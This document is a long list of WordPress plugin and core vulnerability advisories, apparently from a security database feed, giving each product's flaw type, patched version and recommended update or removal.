Plugin: Tree Sitemap (Pages, Posts & Categories list)

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Smart Slider 3

Vulnerability: PHP Object Injection
Patched Version: 3.5.1.11
Recommended Action: Update to version 3.5.1.11, or a newer patched version

Plugin: Download Manager

Vulnerability: Authenticated Arbitrary Options Update
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WP

Vulnerability: Authenticated (Administrator+) CSV Injection
Patched Version: 1.2.3.10
Recommended Action: Update to version 1.2.3.10, or a newer patched version

Plugin: WP Customer Area

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.2.3
Recommended Action: Update to version 8.2.3, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: User Login Log

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Catalogue

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Starter Templates — Elementor, WordPress & Beaver Builder Templates

Vulnerability: Cross-Site Request Forgery in add_to_favorite
Patched Version: 3.2.21
Recommended Action: Update to version 3.2.21, or a newer patched version

Plugin: Hostel

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: For the visually impaired

Vulnerability: Cross-Site Request Forgery to Plugin Settings Changes
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ready! Coming Soon

Vulnerability: No subtitle
Patched Version: 0.5.1
Recommended Action: Update to version 0.5.1, or a newer patched version

Plugin: Void Contact Form 7 Widget For Elementor Page Builder

Vulnerability: Cross-Site Request Forgery in void_cf7_opt_in_user_data_track
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.11.2.1
Recommended Action: Update to version 2.11.2.1, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Missing Authorization in ‘wpfc_preload_single_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.72
Recommended Action: Update to version 3.0.72, or a newer patched version

Plugin: Democracy Poll

Vulnerability: Cross-Site Scripting
Patched Version: 5.4
Recommended Action: Update to version 5.4, or a newer patched version

Plugin: My WP Translate

Vulnerability: Unprotected AJAX Actions
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Libsyn Publisher Hub

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Helpful

Vulnerability: Sensitive Information Disclosure
Patched Version: 4.5.26
Recommended Action: Update to version 4.5.26, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.5.31.7212
Recommended Action: Update to version 7.5.31.7212, or a newer patched version

Plugin: Launcher: Coming Soon & Maintenance Mode

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: WP-reCAPTCHA

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: iTwitter

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Media Tags

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: React Webcam

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Dashboard – Custom WordPress Dashboard

Vulnerability: Login Page Disclosure on Multi-site
Patched Version: 3.7.11
Recommended Action: Update to version 3.7.11, or a newer patched version

Plugin: Admin Menu Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Multi Feed Reader

Vulnerability: Authenticated SQL Injection
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Data Tables Generator by Supsystic

Vulnerability: Missing Authorization on AJAX Actions
Patched Version: 1.9.92
Recommended Action: Update to version 1.9.92, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Cross-Site Request Forgery
Patched Version: 4.4.5
Recommended Action: Update to version 4.4.5, or a newer patched version

Plugin: User Email Verification for WooCommerce

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Elementor Website Builder Pro

Vulnerability: Authenticated (Subscriber+) Privilege Escalation via update_page_option
Patched Version: 3.11.7
Recommended Action: Update to version 3.11.7, or a newer patched version

Plugin: Accordion

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.30
Recommended Action: Update to version 2.2.30, or a newer patched version

Plugin: Files Download Delay

Vulnerability: Missing Authorization to Settings Reset
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Motors – Car Dealer, Classifieds & Listing

Vulnerability: Unauthenticated Settings Import/Export
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: WooCommerce Shipping & Tax

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Post Title Counter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Stockdio Historical Chart

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Weaver Xtreme Theme Support

Vulnerability: Authenticated (Administrator+) PHP Object Injection via Imported File
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: mywebcounter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More

Vulnerability: Information Disclosure via REST API
Patched Version: 6.0.4.1
Recommended Action: Update to version 6.0.4.1, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.12
Recommended Action: Update to version 2.7.12, or a newer patched version

Plugin: Product Vendors

Vulnerability: Insecure Direct Object Reference to Note Creation
Patched Version: 2.1.66
Recommended Action: Update to version 2.1.66, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Broken Password Mechanism
Patched Version: 7.7.0
Recommended Action: Update to version 7.7.0, or a newer patched version

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: SQL Injection
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: 3.1.3
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: AllWebMenus WordPress Menu Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Chronosly Events Calendar

Vulnerability: Cross-Site Request Forgery via plugin_settings_page
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Apollo13 Framework Extensions

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Plugin: Super Forms – Drag & Drop Form Builder

Vulnerability: Arbitrary File Upload
Patched Version: 4.9.800
Recommended Action: Update to version 4.9.800, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via example.html
Patched Version: 3.7.8
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.8, 3.8.8, 3.9.6, 4.0.5, 4.1.5, 4.2.2

Plugin: Membership Simplified

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 4.19.3
Recommended Action: Update to version 4.19.3, or a newer patched version

Plugin: GoodBarber

Vulnerability: Cross-Site Request Forgery via admin_options
Patched Version: 1.0.24
Recommended Action: Update to version 1.0.24, or a newer patched version

Plugin: Go Pricing – WordPress Responsive Pricing Tables

Vulnerability: WordPress Responsive Pricing Tables <= 3.3.19
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: EventON Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: Map Multi Marker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Unite Gallery Lite

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.7.62
Recommended Action: Update to version 1.7.62, or a newer patched version

Plugin: Canto

Vulnerability: Blind Server-Side Request Forgery via detail.php
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: AnyWhere Elementor

Vulnerability: Sensitive Information Exposure
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Image Slider

Vulnerability: Arbitrary File Deletion
Patched Version: 1.1.90
Recommended Action: Update to version 1.1.90, or a newer patched version

Plugin: Comments Ratings

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Request Forgery via Press This
Patched Version: 3.7.19
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.19, 3.8.19, 3.9.17, 4.0.16, 4.1.16, 4.2.13, 4.3.9, 4.4.8, 4.5.7, 4.6.4, 4.7.3

Plugin: Database Sync

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.5
Recommended Action: Update to version 0.5, or a newer patched version

Plugin: Profile Builder Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.10.1
Recommended Action: Update to version 3.10.1, or a newer patched version

Plugin: Seed Fonts

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Zero Spam for WordPress

Vulnerability: Admin+ SQL Injection
Patched Version: 5.2.11
Recommended Action: Update to version 5.2.11, or a newer patched version

Plugin: cformsII

Vulnerability: Cross-Site Request Forgery leading to Settings Updates
Patched Version: 15.0.5
Recommended Action: Update to version 15.0.5, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Cross-Site Request Forgery via wpas_edit_reply_ajax()
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: WPBakery Page Builder Clipboard

Vulnerability: Arbitrary License Options Update
Patched Version: 4.5.8
Recommended Action: Update to version 4.5.8, or a newer patched version

Plugin: Useful Banner Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Postie

Vulnerability: Post Submission Spoofing & Stored Cross-Site Scripting
Patched Version: 1.9.41
Recommended Action: Update to version 1.9.41, or a newer patched version

Plugin: WordPress Social Invitations – Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.4.3
Recommended Action: Update to version 1.4.4.3, or a newer patched version

Plugin: RokNewsPager

Vulnerability: Arbitrary File Upload
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Unauthenticated Sensitive Information Exposure via ai_ajax
Patched Version: 2.7.31
Recommended Action: Update to version 2.7.31, or a newer patched version

Plugin: Widgets on Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: User Activity Log

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: bbPress

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Zoho CRM Lead Magnet

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update
Patched Version: 1.7.5.9
Recommended Action: Update to version 1.7.5.9, or a newer patched version

Plugin: Hustle – Email Marketing, Lead Generation, Optins, Popups

Vulnerability: Unauthenticated CSV Injection
Patched Version: 6.0.8.1
Recommended Action: Update to version 6.0.8.1, or a newer patched version

Plugin: Yet Another bol.com Plugin

Vulnerability: <= 1.4
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Conditional Menus

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: AskApache Firefox Adsense

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Event calendar

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SlickQuiz

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Zoho Forms – Drag & Drop Form Builder for Websites – Contact Forms, Payment Forms, Order Forms & More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: CUBE SLIDER

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Invoice – Web Invoice and Billing

Vulnerability: Insecure Direct Object Reference
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Fileviewer

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Direct Download for Woocommerce

Vulnerability: Local File Inclusion
Patched Version: 1.16
Recommended Action: Update to version 1.16, or a newer patched version

Plugin: Zarzadzanie Kontem

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: IdeaPush

Vulnerability: Missing Authorization
Patched Version: 8.58
Recommended Action: Update to version 8.58, or a newer patched version

Plugin: WordPress RokBox

Vulnerability: Full Path Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Cross-Site Scripting
Patched Version: 2.72
Recommended Action: Update to version 2.72, or a newer patched version

Plugin: DZS Video Gallery

Vulnerability: Limited Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Deserialization Gadget
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: Enable SVG Uploads

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via SVG
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: PHP Object Injection
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: S3 Video Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Forms Puzzle Captcha

Vulnerability: Captcha Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: 4.57
Recommended Action: Update to version 4.57, or a newer patched version

Plugin: Jayj Quicktag

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Event Calendar WD version

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.0.94
Recommended Action: Update to version 1.0.94, or a newer patched version

Plugin: Easy Google Maps

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.10.1
Recommended Action: Update to version 1.10.1, or a newer patched version

Plugin: Dropdown and scrollable Text

Vulnerability: No subtitle
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Fancy Cats

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: UnGallery

Vulnerability: Command Injection
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Authentication Bypass
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Authenticated (Contributor+) Server-Side Request Forgery in import_wpforms
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: Use Any Font | Custom Font Uploader

Vulnerability: Cross-Site Scripting
Patched Version: 6.2.8
Recommended Action: Update to version 6.2.8, or a newer patched version

Plugin: WP e-Commerce – Store Toolkit

Vulnerability: Missing Authorization
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: FlipBook

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: eBay Dropshipping and Affiliate by Wooshark

Vulnerability: Unprotected AJAX Actions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Directory Traversal
Patched Version: 4.10.0
Recommended Action: Update to version 4.10.0, or a newer patched version

Plugin: School Management System – WPSchoolPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.10
Recommended Action: Update to version 2.1.10, or a newer patched version

Plugin: Annual Archive

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Broken Link Checker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.11.9
Recommended Action: Update to version 1.11.9, or a newer patched version

Plugin: WP Customize Login

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPFront Notification Bar

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Reflected Cross-Site Scripting via updraft_restore
Patched Version: 1.16.69
Recommended Action: Update to version 1.16.69, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Cross-Site Scripting
Patched Version: 5.1.4
Recommended Action: Update to version 5.1.4, or a newer patched version

Plugin: Sticky Social Media Icons

Vulnerability: Missing Authorization via ajax_request_handle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Maps Plugin using Google Maps for WordPress – WP Google Map

Vulnerability: Missing Authorization
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: SEUR Oficial

Vulnerability: Authenticated Arbitrary File Download
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Core: WordPress

Vulnerability: Path Traversal and Local File Inclusion
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: Loginizer

Vulnerability: SQL Injection
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: RK Responsive Contact Form

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RokIntroScroller

Vulnerability: Full Path Disclosure
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Missing Authorization to Settings Change
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Coming Soon & Maintenance Mode Page & Under Construction

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.58
Recommended Action: Update to version 1.58, or a newer patched version

Plugin: Relevanssi – A Better Search

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: WordPress Flipbook by Supsystic

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: WP-Filebase

Vulnerability: Remote Code Execution
Patched Version: 0.3.0.04
Recommended Action: Update to version 0.3.0.04, or a newer patched version

Plugin: Flexible Woocommerce Checkout Field Editor

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Missing Authorization to Unauthorized Backup Location Change
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: wp-spamfree

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: InstaWP Connect – 1-click WP Staging & Migration

Vulnerability: Cross-Site Request Forgery via create_file_db_manager
Patched Version: 0.1.0.9
Recommended Action: Update to version 0.1.0.9, or a newer patched version

Plugin: Rucy

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Loginizer

Vulnerability: Blind SQL Injection
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Gutenberg Forms – WordPress Form Builder Plugin

Vulnerability: Authenticated (Subscriber+) Sensitive Information Disclosure
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via page to wpfastestcacheoptions
Patched Version: 0.8.8.6
Recommended Action: Update to version 0.8.8.6, or a newer patched version

Plugin: Export and Import Users and Customers

Vulnerability: CSV Injection
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Skysa App Bar Integration

Vulnerability: Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Staff Directory Plugin: Company Directory

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: SIS Handball

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: itemprop WP for SERP/SEO Rich snippets

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Payment Gateway Per Product for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 2.12.4
Recommended Action: Update to version 2.12.4, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting via action_authenticate_storage
Patched Version: 1.23.4
Recommended Action: Update to version 1.23.4, or a newer patched version

Plugin: Video Contest WordPress Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CTT Expresso para WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.12
Recommended Action: Update to version 3.2.12, or a newer patched version

Plugin: Post Teaser

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: breadcrumb simple

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

